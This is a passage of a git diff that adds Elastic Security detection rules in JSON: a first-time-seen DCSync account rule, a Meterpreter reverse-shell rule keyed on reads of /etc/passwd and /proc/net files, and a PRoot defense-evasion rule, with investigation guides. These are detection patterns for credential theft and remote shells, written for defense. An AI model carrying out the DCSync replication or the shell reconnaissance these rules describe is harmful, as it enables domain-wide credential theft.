@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "history_window_start": "now-15d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "FirstTime Seen Account Performing DCSync", + "new_terms_fields": [ + "winlog.event_data.SubjectUserName" + ], + "note": "## Triage and analysis\n\n### Investigating FirstTime Seen Account Performing DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. 
Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. 
If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. 
Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:(\"Directory Service Access\" or \"object-operation-performed\") and event.code:\"4662\" and\n winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or\n *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or\n *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and\n not winlog.event_data.SubjectUserName:(*$ or MSOL_*)\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": 
"5c6f4c58-b381-452a-8976-f1b1c6aa0def", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 10 + }, + "id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def_10", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_9.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_9.json new file mode 100644 index 00000000000..bdc8e3f2e28 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_9.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "history_window_start": "now-15d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "FirstTime Seen Account Performing DCSync", + "new_terms_fields": [ + "winlog.event_data.SubjectUserName" + ], + "note": "## Triage and analysis\n\n### Investigating FirstTime Seen Account Performing DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. 
Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. 
If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. 
Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "event.action:(\"Directory Service Access\" or \"object-operation-performed\") and event.code:\"4662\" and\n winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or\n *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or\n *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and\n not winlog.event_data.SubjectUserName:(*$ or MSOL_*)\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", + "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", + "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": 
"5c6f4c58-b381-452a-8976-f1b1c6aa0def", + "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.006", + "name": "DCSync", + "reference": "https://attack.mitre.org/techniques/T1003/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def_9", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_5.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_5.json new file mode 100644 index 00000000000..a72ae602efc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_5.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Meterpreter Reverse Shell", + "query": "sample by host.id, process.pid, user.id\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 
47, + "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -w /proc/net/ -p r -k audit_proc\n -w /etc/machine-id -p wa -k machineid\n -w /etc/passwd -p wa -k passwd\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": 
"T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "5c895b4f-9133-4e68-9e23-59902175355c_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_6.json b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_6.json new file mode 100644 index 00000000000..f8d80b08650 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c895b4f-9133-4e68-9e23-59902175355c_6.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Meterpreter Reverse Shell", + "query": "sample by host.id, process.pid, user.id\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 
47, + "rule_id": "5c895b4f-9133-4e68-9e23-59902175355c", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -w /proc/net/ -p r -k audit_proc\n -w /etc/machine-id -p wa -k machineid\n -w /etc/passwd -p wa -k passwd\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": 
"T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "5c895b4f-9133-4e68-9e23-59902175355c_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6.json new file mode 100644 index 00000000000..d6c836600a1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6.json 
@@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. 
Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Defense Evasion via PRoot", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and process.parent.name == \"proot\"\n", + "references": [ + "https://proot-me.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. 
Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_6", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7.json new file mode 100644 index 00000000000..2283089cbe2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7.json 
